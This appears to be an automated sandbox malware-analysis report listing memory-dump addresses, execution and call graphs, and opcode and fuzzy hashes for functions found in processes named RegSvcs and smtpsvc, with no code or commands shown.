                                                        0x005a4644
                                                        0x005a4644
                                                        0x005a4646
                                                        0x005a4648
                                                        0x005a464a
                                                        0x005a464c
                                                        0x005a464c
                                                        0x005a464d
                                                        0x005a464d
                                                        0x005a464f
                                                        0x005a4651
                                                        0x005a4651
                                                        0x005a4596
                                                        0x005a4596
                                                        0x005a45fd
                                                        0x005a45fd
                                                        0x00000000
                                                        0x005a4598
                                                        0x005a4598
                                                        0x005a459d
                                                        0x00000000
                                                        0x005a459f
                                                        0x005a459f
                                                        0x005a45a0
                                                        0x005a45a0
                                                        0x00000000
                                                        0x005a45a0
                                                        0x005a459d
                                                        0x005a4596
                                                        0x005a4594
                                                        0x005a4592
                                                        0x005a4583
                                                        0x005a4571
                                                        0x005a456a
                                                        0x005a4567
                                                        0x005a4560
                                                        0x005a455d
                                                        0x005a4652
                                                        0x005a4654
                                                        0x005a4656
                                                        0x005a4658
                                                        0x005a465a
                                                        0x005a465c
                                                        0x005a465e
                                                        0x005a4660
                                                        0x005a4662
                                                        0x005a4664
                                                        0x005a4664
                                                        0x005a4664
                                                        0x005a466a
                                                        0x005a466b
                                                        0x005a4670
                                                        0x005a4672
                                                        0x005a4677
                                                        0x005a4678
                                                        0x005a467d
                                                        0x005a46ee
                                                        0x005a46ee
                                                        0x005a46f0
                                                        0x005a46f3
                                                        0x005a46f5
                                                        0x005a46f7
                                                        0x005a46f9
                                                        0x005a46ff
                                                        0x005a4701
                                                        0x005a4703
                                                        0x005a4703
                                                        0x005a467f
                                                        0x005a467f
                                                        0x005a4682
                                                        0x005a4683
                                                        0x005a4683
                                                        0x005a4683
                                                        0x005a4686
                                                        0x005a4687
                                                        0x005a4688
                                                        0x005a4689
                                                        0x005a46ab
                                                        0x005a46ab
                                                        0x005a46ad
                                                        0x005a46ae
                                                        0x005a46b0
                                                        0x005a46b3
                                                        0x005a46b4
                                                        0x005a46b5
                                                        0x005a46b7
                                                        0x005a46b9
                                                        0x005a46bb
                                                        0x005a46bd
                                                        0x005a46c1
                                                        0x005a46c3
                                                        0x005a46c5
                                                        0x005a46c7
                                                        0x005a46c9
                                                        0x005a46cb
                                                        0x005a46cd
                                                        0x005a46cf
                                                        0x005a46d1
                                                        0x005a46d4
                                                        0x005a46d6
                                                        0x005a46d8
                                                        0x005a46da
                                                        0x005a46db
                                                        0x005a46dd
                                                        0x005a46df
                                                        0x005a46e0
                                                        0x005a46e2
                                                        0x005a46e4
                                                        0x005a46e6
                                                        0x005a46e8
                                                        0x005a46eb
                                                        0x005a46ed
                                                        0x005a46ed
                                                        0x00000000
                                                        0x005a468b
                                                        0x005a468b
                                                        0x005a468e
                                                        0x005a4690
                                                        0x005a4691
                                                        0x005a4694
                                                        0x005a4698
                                                        0x005a469b
                                                        0x005a46a3
                                                        0x005a46a5
                                                        0x005a46a7
                                                        0x005a46a9
                                                        0x005a46aa
                                                        0x005a46aa
                                                        0x00000000
                                                        0x005a46aa
                                                        0x005a468e
                                                        0x005a4689
                                                        0x005a4707
                                                        0x005a4708
                                                        0x005a470a
                                                        0x005a470c
                                                        0x005a470e
                                                        0x005a4710
                                                        0x005a4712
                                                        0x005a4714
                                                        0x005a4716
                                                        0x005a4718
                                                        0x005a471a
                                                        0x005a471c
                                                        0x005a471e
                                                        0x005a4720
                                                        0x005a4722
                                                        0x005a4724
                                                        0x005a4726
                                                        0x005a4728
                                                        0x005a472a
                                                        0x005a472b
                                                        0x005a472d
                                                        0x005a472e
                                                        0x005a4730
                                                        0x005a4732
                                                        0x005a4733
                                                        0x005a4736
                                                        0x005a4738
                                                        0x005a473a
                                                        0x005a473c
                                                        0x005a473e
                                                        0x005a4740
                                                        0x005a4742
                                                        0x005a4744
                                                        0x005a4746
                                                        0x005a4748
                                                        0x005a474a
                                                        0x005a474d
                                                        0x005a474f
                                                        0x005a4751
                                                        0x005a4753
                                                        0x005a4755
                                                        0x005a4757
                                                        0x005a4759
                                                        0x005a475b
                                                        0x005a475d
                                                        0x005a475f
                                                        0x005a4761
                                                        0x005a4763
                                                        0x005a4765
                                                        0x005a4767
                                                        0x005a4769
                                                        0x005a476b
                                                        0x005a476d
                                                        0x005a476f
                                                        0x005a4771
                                                        0x005a4773
                                                        0x005a4775
                                                        0x005a4777
                                                        0x005a4779
                                                        0x005a477b
                                                        0x005a477d
                                                        0x005a477f
                                                        0x005a4781
                                                        0x005a4783
                                                        0x005a4785
                                                        0x005a4787
                                                        0x005a4789
                                                        0x005a478b
                                                        0x005a478d
                                                        0x005a478f
                                                        0x005a4791
                                                        0x005a4793
                                                        0x005a4795
                                                        0x005a4796
                                                        0x005a4798
                                                        0x005a479a
                                                        0x005a479c
                                                        0x005a479e
                                                        0x005a47a0
                                                        0x005a47a0
                                                        0x005a47a2
                                                        0x005a4809
                                                        0x005a4809
                                                        0x005a480b
                                                        0x005a480d
                                                        0x005a480f
                                                        0x005a4811
                                                        0x005a4813
                                                        0x005a4815
                                                        0x005a4816
                                                        0x005a4818
                                                        0x005a4819
                                                        0x005a4819
                                                        0x00000000
                                                        0x005a47a4
                                                        0x005a47a4
                                                        0x005a481a
                                                        0x005a481a
                                                        0x005a481c
                                                        0x005a481e
                                                        0x005a4820
                                                        0x005a4822
                                                        0x005a4824
                                                        0x005a4826
                                                        0x005a4828
                                                        0x005a4828
                                                        0x005a4828
                                                        0x005a47a6
                                                        0x005a47a6
                                                        0x005a47a8
                                                        0x005a47af
                                                        0x005a47b1
                                                        0x005a47b3
                                                        0x005a47b5
                                                        0x005a47b7
                                                        0x005a47b9
                                                        0x005a47bb
                                                        0x005a47bd
                                                        0x005a47bf
                                                        0x005a47c1
                                                        0x005a47c3
                                                        0x005a47c5
                                                        0x005a47c7
                                                        0x005a47c7
                                                        0x005a47c7
                                                        0x005a47ca
                                                        0x005a483f
                                                        0x005a483f
                                                        0x005a4841
                                                        0x005a4843
                                                        0x005a4845
                                                        0x005a4847
                                                        0x005a4849
                                                        0x005a484b
                                                        0x005a484d
                                                        0x005a484f
                                                        0x005a4851
                                                        0x005a4853
                                                        0x005a4855
                                                        0x005a4857
                                                        0x005a4857
                                                        0x00000000
                                                        0x005a47cc
                                                        0x005a47cc
                                                        0x005a4831
                                                        0x005a4832
                                                        0x005a4834
                                                        0x005a4836
                                                        0x005a483c
                                                        0x005a483e
                                                        0x00000000
                                                        0x005a47ce
                                                        0x005a47ce
                                                        0x005a47d0
                                                        0x005a47d6
                                                        0x005a47d7
                                                        0x005a47d9
                                                        0x005a47dc
                                                        0x005a47de
                                                        0x005a47e0
                                                        0x005a47e2
                                                        0x005a47e4
                                                        0x005a47e6
                                                        0x005a47e8
                                                        0x005a47ea
                                                        0x005a47ec
                                                        0x005a47ef
                                                        0x005a47ef
                                                        0x005a47ef
                                                        0x005a47f2
                                                        0x005a4859
                                                        0x005a4859
                                                        0x005a485b
                                                        0x005a485d
                                                        0x005a485f
                                                        0x005a4861
                                                        0x005a4863
                                                        0x005a4865
                                                        0x005a4867
                                                        0x005a4869
                                                        0x005a486b
                                                        0x005a486d
                                                        0x005a486f
                                                        0x005a486f
                                                        0x005a47f4
                                                        0x005a47f4
                                                        0x005a47f5
                                                        0x005a47f6
                                                        0x005a47f8
                                                        0x005a47fb
                                                        0x005a47fd
                                                        0x005a4803
                                                        0x005a4805
                                                        0x005a4807
                                                        0x005a4807
                                                        0x00000000
                                                        0x005a4807
                                                        0x005a47f2
                                                        0x005a47cc
                                                        0x005a47ca
                                                        0x005a47a4
                                                        0x005a4871
                                                        0x005a4873
                                                        0x005a4875
                                                        0x005a4877
                                                        0x005a4879
                                                        0x005a487b
                                                        0x005a487c
                                                        0x005a4883
                                                        0x005a4885
                                                        0x005a4888
                                                        0x005a488a
                                                        0x005a488a
                                                        0x005a488c
                                                        0x005a488e
                                                        0x005a4890
                                                        0x005a4893
                                                        0x005a4894
                                                        0x005a4896
                                                        0x005a4897
                                                        0x005a4899
                                                        0x005a4899
                                                        0x005a489b
                                                        0x005a489e
                                                        0x005a48a0
                                                        0x005a48a0
                                                        0x005a48a0
                                                        0x005a489b
                                                        0x005a48a5
                                                        0x005a48a7
                                                        0x005a48ad
                                                        0x005a48ae
                                                        0x005a48af
                                                        0x005a48b1
                                                        0x005a48b1
                                                        0x005a48b3
                                                        0x005a48b5
                                                        0x005a48b7
                                                        0x005a48b9
                                                        0x005a48b9
                                                        0x005a48bc
                                                        0x005a48bc
                                                        0x005a48be
                                                        0x005a48c0
                                                        0x005a48c6
                                                        0x005a48c8
                                                        0x005a48c8
                                                        0x005a48ca
                                                        0x005a48cc
                                                        0x005a48ce
                                                        0x005a48cf
                                                        0x005a48d0
                                                        0x005a48d1
                                                        0x005a48d3
                                                        0x005a48d5
                                                        0x005a48d8
                                                        0x005a48d8
                                                        0x005a48d8
                                                        0x005a48da
                                                        0x005a48db
                                                        0x005a48de
                                                        0x005a48e4
                                                        0x005a48e9
                                                        0x005a48ee
                                                        0x005a48f4
                                                        0x005a48f7
                                                        0x005a48f9
                                                        0x005a48fb
                                                        0x005a48fc
                                                        0x005a48fe
                                                        0x005a4901
                                                        0x005a4902
                                                        0x005a4904
                                                        0x005a4906
                                                        0x005a4907
                                                        0x005a4909
                                                        0x005a490b
                                                        0x005a490d
                                                        0x005a490e
                                                        0x005a4911
                                                        0x005a4912
                                                        0x005a4914
                                                        0x005a4916
                                                        0x005a4919
                                                        0x005a491b
                                                        0x005a491d
                                                        0x005a491f
                                                        0x005a491f
                                                        0x005a4921
                                                        0x005a4924
                                                        0x005a4926
                                                        0x005a4926
                                                        0x005a4926
                                                        0x005a4928
                                                        0x005a492a
                                                        0x005a492b
                                                        0x005a492b
                                                        0x005a492d
                                                        0x005a492f
                                                        0x005a4935
                                                        0x005a4937
                                                        0x005a4937
                                                        0x005a4937
                                                        0x005a4938
                                                        0x005a493b
                                                        0x005a493d
                                                        0x005a4941
                                                        0x005a4943
                                                        0x005a4945
                                                        0x005a4947
                                                        0x005a4949
                                                        0x005a494a
                                                        0x005a4950
                                                        0x005a4954
                                                        0x005a495d
                                                        0x005a4960
                                                        0x005a4961
                                                        0x005a4962
                                                        0x005a4964
                                                        0x005a4965
                                                        0x005a4966
                                                        0x005a4969
                                                        0x005a496b
                                                        0x005a496d
                                                        0x005a496e
                                                        0x005a496f
                                                        0x005a4972
                                                        0x005a4974
                                                        0x005a4976
                                                        0x005a4979
                                                        0x005a497b
                                                        0x005a497f
                                                        0x005a4981
                                                        0x005a4982
                                                        0x005a4982
                                                        0x005a4984
                                                        0x005a4986
                                                        0x005a4986
                                                        0x005a4986
                                                        0x005a4988
                                                        0x005a498a
                                                        0x005a498a
                                                        0x005a498d
                                                        0x005a498e
                                                        0x005a4990
                                                        0x005a4992
                                                        0x005a4992
                                                        0x005a4992
                                                        0x005a4993
                                                        0x005a4996
                                                        0x005a4998
                                                        0x005a499d
                                                        0x005a49a0
                                                        0x005a49a2
                                                        0x005a49a5
                                                        0x005a49a6
                                                        0x005a49aa
                                                        0x005a49ad
                                                        0x005a49ae
                                                        0x005a49b1
                                                        0x005a49b3
                                                        0x005a49b5
                                                        0x005a49b7
                                                        0x005a49ba
                                                        0x005a49bc
                                                        0x005a49be
                                                        0x005a49c1
                                                        0x005a49c3
                                                        0x005a49c7
                                                        0x005a49c9
                                                        0x005a49cc
                                                        0x005a49ce
                                                        0x005a49d0
                                                        0x005a49d0
                                                        0x005a49d2
                                                        0x005a49d4
                                                        0x005a49d4
                                                        0x005a49d4
                                                        0x005a49d5
                                                        0x005a49d8
                                                        0x005a49da
                                                        0x005a49df
                                                        0x005a49e2
                                                        0x005a49e4
                                                        0x005a49ea
                                                        0x005a49ed
                                                        0x005a49ee
                                                        0x005a49f0
                                                        0x005a49f1
                                                        0x005a49f2
                                                        0x005a49f3
                                                        0x005a49f6
                                                        0x005a49f8
                                                        0x005a49f9
                                                        0x005a49fb
                                                        0x005a49fe
                                                        0x005a4a00
                                                        0x005a4a02
                                                        0x005a4a03
                                                        0x005a4a04
                                                        0x005a4a06
                                                        0x005a4a0b
                                                        0x005a4a0f
                                                        0x005a4a11
                                                        0x005a4a14
                                                        0x005a4a1c
                                                        0x005a4a1d
                                                        0x005a4a1f
                                                        0x005a4a24
                                                        0x005a4a27
                                                        0x005a4a29
                                                        0x005a4a2f
                                                        0x005a4a32
                                                        0x005a4a33
                                                        0x005a4a35
                                                        0x005a4a36
                                                        0x005a4a37
                                                        0x005a4a38
                                                        0x005a4a3b
                                                        0x005a4a3d
                                                        0x005a4a45
                                                        0x005a4a47
                                                        0x005a4a49
                                                        0x005a4a4e
                                                        0x005a4a50
                                                        0x005a4a55
                                                        0x005a4a57
                                                        0x005a4a57
                                                        0x005a4a59
                                                        0x005a4a5a
                                                        0x005a4a5c
                                                        0x005a4a5e
                                                        0x005a4a60
                                                        0x005a4a60
                                                        0x005a4a61
                                                        0x005a4a63
                                                        0x005a4a65
                                                        0x005a4a65
                                                        0x005a4a65
                                                        0x005a4a67
                                                        0x005a4a69
                                                        0x005a4a6a
                                                        0x005a4a6a
                                                        0x005a4a6c
                                                        0x005a4a6e
                                                        0x005a4a70
                                                        0x005a4a72
                                                        0x005a4a72
                                                        0x005a4a73
                                                        0x005a4a73
                                                        0x005a41c7
                                                        0x005a41c7
                                                        0x005a41cb
                                                        0x005a41d0
                                                        0x005a41d1
                                                        0x005a41d3
                                                        0x005a41d4
                                                        0x005a41d4
                                                        0x005a41c4
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Offset: 005A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_5a0000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
                                                        • Instruction ID: dd6b58f70bf19c86841f72991a32ed549db510eef3bbb6658a19fdcd6fa9999c
                                                        • Opcode Fuzzy Hash: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
                                                        • Instruction Fuzzy Hash: 82316B1500F7C26FC7134B749DB5AE6BF75AEA3200B0E85C7D0C08E4A3E255595AD7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:22.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:13
                                                        Total number of Limit Nodes:0
                                                        execution_graph 743 2f0479 744 2f0488 743->744 746 2f04c0 SearchPathW 744->746 745 2f04a3 746->745 728 2f0488 731 2f04c0 728->731 732 2f04f6 731->732 733 2f0526 732->733 735 2f1580 732->735 736 2f1591 735->736 739 2f0108 736->739 741 2f15f8 SearchPathW 739->741 742 2f17ad 741->742

                                                        Callgraph

                                                        Executed Functions

                                                        Function 002F0108 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 2f0108-2f1671 180 2f167c-2f1683 177->180 181 2f1673-2f1679 177->181 182 2f168e-2f1697 180->182 183 2f1685-2f168b 180->183 181->180 184 2f1699-2f16a5 182->184 185 2f16a8-2f16b1 182->185 183->182 184->185 186 2f171e-2f1722 185->186 187 2f16b3-2f16e0 185->187 188 2f174d-2f1758 186->188 189 2f1724-2f1747 186->189 194 2f16e2-2f16e4 187->194 195 2f1710 187->195 191 2f175a-2f1762 188->191 192 2f1764-2f17ab SearchPathW 188->192 189->188 191->192 196 2f17ad-2f17b3 192->196 197 2f17b4-2f17c9 192->197 198 2f1706-2f170e 194->198 199 2f16e6-2f16f0 194->199 200 2f1715-2f1718 195->200 196->197 206 2f17df-2f1806 197->206 207 2f17cb-2f17d7 197->207 198->200 203 2f16f4-2f1702 199->203 204 2f16f2 199->204 200->186 203->203 208 2f1704 203->208 204->203 211 2f1808-2f180c 206->211 212 2f1816 206->212 207->206 208->198 211->212 213 2f180e 211->213 214 2f1817 212->214 213->212 214->214
                                                        APIs
                                                        • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 002F179B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.446014797.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID: hM)
                                                        • API String ID: 2203818243-3202411182
                                                        • Opcode ID: 37d3ebb4fc79a4603ab4975982cbe3d29705b878ca985fae1bf12edc1d6acda2
                                                        • Instruction ID: 26a643493d6436ce1005802f0f2fc04acd10188d7a08977ee6ed0ea05505f1b4
                                                        • Opcode Fuzzy Hash: 37d3ebb4fc79a4603ab4975982cbe3d29705b878ca985fae1bf12edc1d6acda2
                                                        • Instruction Fuzzy Hash: 9D7134B4D1021DDFDB24CF99C8846AEFBB5BF48314F648029E919A7350DB70A955CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:31.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:25
                                                        Total number of Limit Nodes:1
                                                        execution_graph 870 200488 873 2004c0 870->873 878 2004f6 873->878 874 200526 878->874 879 201580 878->879 883 20149c 878->883 888 201571 878->888 880 201591 879->880 892 200108 880->892 885 2014af 883->885 884 2014c5 884->874 885->884 886 200108 SearchPathW 885->886 887 2015cf 886->887 887->874 889 201580 888->889 890 200108 SearchPathW 889->890 891 2015cf 890->891 891->874 894 2015f8 SearchPathW 892->894 895 2017ad 894->895 900 200479 901 200488 900->901 903 2004c0 SearchPathW 901->903 902 2004a3 903->902 896 2015ec 898 2015f8 SearchPathW 896->898 899 2017ad 898->899

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00200A20 1 Function_002012A0 2 Function_002018A3 3 Function_01184E1E 4 Function_002004A7 5 Function_002018A8 6 Function_002009A8 7 Function_00201528 8 Function_002013B0 9 Function_01182989 10 Function_002009B2 11 Function_01182D0E 12 Function_002009BB 13 Function_00201580 15 Function_00200108 13->15 14 Function_00200B07 16 Function_00200488 47 Function_002004C0 16->47 17 Function_0020140B 18 Function_00201410 19 Function_00200A10 20 Function_00200091 21 Function_01182D2C 22 Function_00200095 23 Function_00200B18 24 Function_0020009B 25 Function_0020149C 25->15 26 Function_0020009D 27 Function_00201860 28 Function_00200061 29 Function_00200065 30 Function_002009E8 31 Function_00200069 32 Function_002015EC 33 Function_0020006D 34 Function_00200071 35 Function_002009F1 36 Function_00201571 36->15 37 Function_002017F4 38 Function_00200075 39 Function_01183340 40 Function_00200079 41 Function_00200479 41->47 42 Function_002017FA 43 Function_002009FB 44 Function_0020187B 45 Function_0020077C 46 Function_002013C0 47->0 47->13 47->14 47->17 47->18 47->19 47->23 47->25 47->27 47->36 56 Function_00201850 47->56 48 Function_002009C4 49 Function_00200045 50 Function_00200448 51 Function_00200049 52 Function_00201349 53 Function_01182D73 54 Function_0020004D 55 Function_002009CD 57 Function_00200051 58 Function_00200055 59 Function_002009D6 60 Function_00200059 61 Function_0020095C 62 Function_0020005D 63 Function_01182CE6 64 Function_002009DF

                                                        Executed Functions

                                                        Function 002015EC Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2015ec-201671 3 201673-201679 0->3 4 20167c-201683 0->4 3->4 5 201685-20168b 4->5 6 20168e-201697 4->6 5->6 7 2016a8-2016b1 6->7 8 201699-2016a5 6->8 9 2016b3-2016e0 7->9 10 20171e-201722 7->10 8->7 17 201710 9->17 18 2016e2-2016e4 9->18 11 201724-201747 10->11 12 20174d-201758 10->12 11->12 14 201764-2017ab SearchPathW 12->14 15 20175a-201762 12->15 19 2017b4-2017c9 14->19 20 2017ad-2017b3 14->20 15->14 24 201715-201718 17->24 21 201706-20170e 18->21 22 2016e6-2016f0 18->22 30 2017cb-2017d7 19->30 31 2017df-201806 19->31 20->19 21->24 27 2016f2 22->27 28 2016f4-201702 22->28 24->10 27->28 28->28 29 201704 28->29 29->21 30->31 34 201816 31->34 35 201808-20180c 31->35 37 201817 34->37 35->34 36 20180e 35->36 36->34 37->37
                                                        APIs
                                                        • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 0020179B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.449024050.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_200000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID:
                                                        • API String ID: 2203818243-0
                                                        • Opcode ID: d1eb5c99d83051972fee81048b769058c9c9f5af5023c4a47331bcb3a448c940
                                                        • Instruction ID: 5579e20995b6d1ee1ea187ff6e960d15e6ced1e2cd857467c93e289ed3d34d4e
                                                        • Opcode Fuzzy Hash: d1eb5c99d83051972fee81048b769058c9c9f5af5023c4a47331bcb3a448c940
                                                        • Instruction Fuzzy Hash: 767125B4D103198FDB24CF99C88469EFBF5BF48314F248129E819AB3A1DB74A955CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00200108 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 38 200108-201671 41 201673-201679 38->41 42 20167c-201683 38->42 41->42 43 201685-20168b 42->43 44 20168e-201697 42->44 43->44 45 2016a8-2016b1 44->45 46 201699-2016a5 44->46 47 2016b3-2016e0 45->47 48 20171e-201722 45->48 46->45 55 201710 47->55 56 2016e2-2016e4 47->56 49 201724-201747 48->49 50 20174d-201758 48->50 49->50 52 201764-2017ab SearchPathW 50->52 53 20175a-201762 50->53 57 2017b4-2017c9 52->57 58 2017ad-2017b3 52->58 53->52 62 201715-201718 55->62 59 201706-20170e 56->59 60 2016e6-2016f0 56->60 68 2017cb-2017d7 57->68 69 2017df-201806 57->69 58->57 59->62 65 2016f2 60->65 66 2016f4-201702 60->66 62->48 65->66 66->66 67 201704 66->67 67->59 68->69 72 201816 69->72 73 201808-20180c 69->73 75 201817 72->75 73->72 74 20180e 73->74 74->72 75->75
                                                        APIs
                                                        • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 0020179B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.449024050.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_200000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID:
                                                        • API String ID: 2203818243-0
                                                        • Opcode ID: 0e6a842775d5e59b9c8406e5c3965cc8d0a0b218c4963904c8a0de792075dd19
                                                        • Instruction ID: 82636d6e4dddb1e98a24323d3787989a784e5d66d035ac46cdb0c28560c58a44
                                                        • Opcode Fuzzy Hash: 0e6a842775d5e59b9c8406e5c3965cc8d0a0b218c4963904c8a0de792075dd19
                                                        • Instruction Fuzzy Hash: 507134B4D103198FDB24CF99C88469EFBB5BF48314F24802DE819AB3A1DB70A955CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 001E04C0 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d(o
                                                        • API String ID: 0-527354965
                                                        • Opcode ID: 5aa0a9cca2c00fbceb0714344b63ceafc0d7130ff6f58930de139b0257bae291
                                                        • Instruction ID: b8b30cf39be153ccbd4fdfdb3300955663a23eb7ead1507ef1f61cb75be7969b
                                                        • Opcode Fuzzy Hash: 5aa0a9cca2c00fbceb0714344b63ceafc0d7130ff6f58930de139b0257bae291
                                                        • Instruction Fuzzy Hash: 0F71D135A00B458FDB16DFA1D8486AEBBB2FF88304F148929D4066B7A5DF74AC85CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E0B18 Relevance: .6, Instructions: 574COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ddc49e5d6694045bd376743060f0de61761a7fb0e75b1d699f1bc04ca01aef7d
                                                        • Instruction ID: 2e68708e3b0826350ae86b1692cef0aa654eff03aa887d028958bc67dbd32d36
                                                        • Opcode Fuzzy Hash: ddc49e5d6694045bd376743060f0de61761a7fb0e75b1d699f1bc04ca01aef7d
                                                        • Instruction Fuzzy Hash: 3832B031700A41CFD718EF75D89066E77A2BBC8319F24882CC5069B799DB79EC82CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E0A10 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4492a9b0f700f496fa26ab608d495a752516a74157ffe38f576cccd9871fb37
                                                        • Instruction ID: edf4a55c46209540ae62c5a39a5c513ddae4a8be125b851ab0ac0d0979be83ce
                                                        • Opcode Fuzzy Hash: a4492a9b0f700f496fa26ab608d495a752516a74157ffe38f576cccd9871fb37
                                                        • Instruction Fuzzy Hash: 693159343402508FC709EBB8C85899D37E6AF8970972648B8E406CF7B2DB35DC82CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E0A20 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09ce64d3a3dc966cfb26db05e90581dee3de54b6f8365c8d194432f37cf17b9c
                                                        • Instruction ID: c93dd8b952bf1ffcbf30124fee31aba429f0fb1928beb7822bff7ae15cac526a
                                                        • Opcode Fuzzy Hash: 09ce64d3a3dc966cfb26db05e90581dee3de54b6f8365c8d194432f37cf17b9c
                                                        • Instruction Fuzzy Hash: 132119353406108FC759EBB8C45895D37E6AF8971972248B8E50ACF7B2DB31DC82CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E13C8 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c28bfc14d8b4cf183a8b8450f965ba291f2ac3079492372fd7af3b17c2efd45c
                                                        • Instruction ID: f2e7ce16061dc222a85c317078655cbfe9cd52265ccc017467604fbde7e50df4
                                                        • Opcode Fuzzy Hash: c28bfc14d8b4cf183a8b8450f965ba291f2ac3079492372fd7af3b17c2efd45c
                                                        • Instruction Fuzzy Hash: F9117C75E042459FCB01EFB4D8818DABBB1FF8A30071186AAE515E7222E7349A15CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E13D8 Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9eee23610b75108b1f2a7e38bb15e85f3bd2555a91bf5ba43ece1f17dcce5260
                                                        • Instruction ID: 66be1c3beffd5d91a361fac1ae4ebbbb8da03f94495a083f1cb336a2bbbbe58d
                                                        • Opcode Fuzzy Hash: 9eee23610b75108b1f2a7e38bb15e85f3bd2555a91bf5ba43ece1f17dcce5260
                                                        • Instruction Fuzzy Hash: AE019E76E002059FCB40EFB4D8808DEFBB5FF8D210710866AE515E7221E734A955CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E0479 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
